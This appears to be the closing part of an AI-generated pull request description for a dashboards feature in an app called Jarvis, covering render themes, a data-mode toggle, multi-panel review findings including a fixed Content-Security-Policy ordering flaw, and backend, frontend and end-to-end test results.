- Org/Role publishing is gated to the Jarvis Admin tier; `target_user` is pinned to the owner.

### Themes & explicit data mode (owner follow-ups)
- Named render **themes** injected as CSS variables — default **Jarvis** (the app's own design language, so unprompted output looks native), plus Insight / Claude / Graphite. Picker top-right on the builder and view page.
- Explicit **Data: Auto / Static / Live** toggle in the composer that drives the agent, not just wording inference.

### Review
Built, then reviewed by 5 panels (Sonnet UX/design + use-case; Opus adversarial-security + perf/day-to-day; plus a live UX pass). **All findings fixed**, including a P0-chain CSP-ordering flaw (author markup before `<head>` could execute pre-CSP — now the srcdoc is always re-wrapped so the CSP is the first parsed node; live-verified a pre-`<head>` exfil script is dropped) and the `target_user` pinning gap.

### Tests
- Backend: `test_dashboards_api` (39), `test_dashboard_permissions` (17), `test_canvas_embeds` (13) — all green; regressions (`test_chat_endpoint_gating`, `test_triggers_api`, `test_turn_handler_report_context`) green.
- Frontend: `node --test` on the srcdoc util (16), incl. CSP-ordering + host-client-strip security regressions.
- Live E2E on jarvis.localhost: chat-build → save → view (data fetched as viewer) → PNG/PDF export → saved list + palette; CSP egress blocked; edit round-trip carries dashboard identity.

Companion persona skill: Aerele-RnD/jarvis-persona `feat/jarvis-dashboards-skill`.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
